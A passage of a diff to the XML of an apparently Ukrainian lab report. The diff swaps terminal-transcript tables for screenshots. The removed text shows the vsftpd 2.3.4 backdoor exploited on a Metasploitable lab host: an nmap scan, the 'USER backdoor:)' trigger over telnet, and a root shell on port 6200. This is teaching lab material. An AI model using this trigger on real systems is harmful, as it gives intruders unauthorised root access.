-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">uname -a</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">hostname</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">metasploitable</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">exit</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="6A9955"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"># === POST-EXPLOITATION VERIFICATION ===</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="569CD6"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">kali@kali:~$ nmap -sV -p 21 192.168.56.101</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">PORT   STATE SERVICE VERSION</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">21/tcp open  ftp     vsftpd 2.3.4</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Nmap done: 1 IP address (1 host up) scanned in 0.49 seconds</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="100" w:before="100"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5715000" cy="2733675"/>
+            <wp:effectExtent t="0" r="0" b="0" l="0"/>
+            <wp:docPr id="1" name="" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14" cstate="none"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5715000" cy="2733675"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="100" w:before="100"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5715000" cy="2362200"/>
+            <wp:effectExtent t="0" r="0" b="0" l="0"/>
+            <wp:docPr id="1" name="" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15" cstate="none"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5715000" cy="2362200"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="0" w:before="0"/>
@@ -6736,115 +5288,55 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">Крок 1: Підключення до FTP (термінал 1)</w:t>
-      </w:r>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblW w:type="dxa" w:w="9026"/>
-        <w:tblBorders>
-          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
-          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
-        </w:tblBorders>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="9026"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="9026"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:color="00FF41" w:sz="6"/>
-              <w:left w:val="single" w:color="00FF41" w:sz="8"/>
-              <w:bottom w:val="single" w:color="00FF41" w:sz="6"/>
-              <w:right w:val="single" w:color="00FF41" w:sz="6"/>
-            </w:tcBorders>
-            <w:shd w:fill="0D1117" w:val="clear"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="160"/>
-              <w:left w:type="dxa" w:w="280"/>
-              <w:bottom w:type="dxa" w:w="160"/>
-              <w:right w:type="dxa" w:w="280"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="569CD6"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">kali@kali:~$ telnet 192.168.56.101 21</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Trying 192.168.56.101...</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Connected to 192.168.56.101.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Escape character is '^]'.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">220 (vsFTPd 2.3.4)</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
+        <w:t xml:space="preserve">Кроки 1–2: Підключення до FTP та активація backdoor (термінал 1)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="100" w:before="100"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5715000" cy="2609850"/>
+            <wp:effectExtent t="0" r="0" b="0" l="0"/>
+            <wp:docPr id="1" name="" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId16" cstate="none"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5715000" cy="2609850"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="0" w:before="0"/>
@@ -6870,347 +5362,55 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">Крок 2: Відправка backdoor-тригера</w:t>
-      </w:r>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblW w:type="dxa" w:w="9026"/>
-        <w:tblBorders>
-          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
-          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
-        </w:tblBorders>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="9026"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="9026"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:color="00FF41" w:sz="6"/>
-              <w:left w:val="single" w:color="00FF41" w:sz="8"/>
-              <w:bottom w:val="single" w:color="00FF41" w:sz="6"/>
-              <w:right w:val="single" w:color="00FF41" w:sz="6"/>
-            </w:tcBorders>
-            <w:shd w:fill="0D1117" w:val="clear"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="160"/>
-              <w:left w:type="dxa" w:w="280"/>
-              <w:bottom w:type="dxa" w:w="160"/>
-              <w:right w:type="dxa" w:w="280"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">USER backdoor:)</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">331 Please specify the password.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">PASS anypassword</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">^]</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">telnet&gt; Connection closed.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="6A9955"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"># Порт 6200 тепер відкритий на 192.168.56.101</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:before="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="8"/>
-          <w:szCs w:val="8"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="60" w:before="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
         <w:t xml:space="preserve">Крок 3: Підключення до backdoor shell (термінал 2)</w:t>
       </w:r>
     </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblW w:type="dxa" w:w="9026"/>
-        <w:tblBorders>
-          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
-          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
-        </w:tblBorders>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="9026"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="9026"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:color="00FF41" w:sz="6"/>
-              <w:left w:val="single" w:color="00FF41" w:sz="8"/>
-              <w:bottom w:val="single" w:color="00FF41" w:sz="6"/>
-              <w:right w:val="single" w:color="00FF41" w:sz="6"/>
-            </w:tcBorders>
-            <w:shd w:fill="0D1117" w:val="clear"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="160"/>
-              <w:left w:type="dxa" w:w="280"/>
-              <w:bottom w:type="dxa" w:w="160"/>
-              <w:right w:type="dxa" w:w="280"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="569CD6"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">kali@kali:~$ telnet 192.168.56.101 6200</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Trying 192.168.56.101...</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Connected to 192.168.56.101.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Escape character is '^]'.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">whoami</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="FF6B35"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">root</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">id</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="FF6B35"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">uid=0(root) gid=0(root)</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">hostname</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">metasploitable</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="100" w:before="100"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5715000" cy="2486025"/>
+            <wp:effectExtent t="0" r="0" b="0" l="0"/>
+            <wp:docPr id="1" name="" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId17" cstate="none"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5715000" cy="2486025"/>
